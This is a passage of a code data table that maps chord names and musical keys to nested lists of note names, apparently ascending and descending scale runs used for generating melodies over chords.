'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'AsDim': {
'GsMinor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'As'], ['E', 'Ds', 'Cs'] ] ],
'BMajor': [ [ ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'As'] ], [ ['As', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'As'], ['E', 'Ds', 'Cs'] ] ],
},
'Fsm7': {
'BMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
'CsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'FsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'AMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'EMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'DMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
},
'Cs7': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'Gm7': {
'DMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'FMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'CMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'DsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'AsMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'GMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
},
'DDim': {
'CMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
'DsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
'CHMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'Gs'], ['F', 'Ds', 'D'], ['Gs', 'G', 'F'] ] ],
},
'AMajor': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'FMinor': {
'GsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'DsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'AsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'FMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'B', 'Gs'] ] ],
},
'EMajor': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'BDim': {
'CMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'F'], ['D', 'C', 'B'], ['F', 'E', 'D'] ] ],
'CHMinor': [ [ ['B', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'B'] ], [ ['B', 'Gs', 'G', 'F'], ['D', 'C', 'B'], ['F', 'Ds', 'D'] ] ],
'AMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'F'], ['D', 'C', 'B'], ['F', 'E', 'D'] ] ],
},
'F7': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'FMaj7': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'FsDim': {
'GMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'C'], ['A', 'G', 'Fs'], ['C', 'B', 'A'] ] ],
'EMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'C'], ['A', 'G', 'Fs'], ['C', 'B', 'A'] ] ],
},
'GDim': {
'GsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'G'], ['Cs', 'C', 'As'] ] ],
'FMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'G'], ['Cs', 'C', 'As'] ] ],
},
'GMinor': {
'DMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'FMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'CMinor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'DsMajor': [ [ ['G', 'Gs', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'Gs', 'G'], ['D', 'C', 'As'] ] ],
'AsMajor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
'GMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
},
'As7': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'Gsm7': {
'CsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'GsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'BMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'DsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'EMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['Ds', 'D', 'C'] ] ],
'FsMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
},
'EMaj7': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'FsMaj7': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
'B7': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'Bm7': {
'BMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'FsMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'GMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'EMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'AMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'DMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
},
'AsMaj7': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'D7': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'AMinor': {
'CMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'GMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'EMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'DMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'FMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'AMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
},
'Am7': {
'CMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'GMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
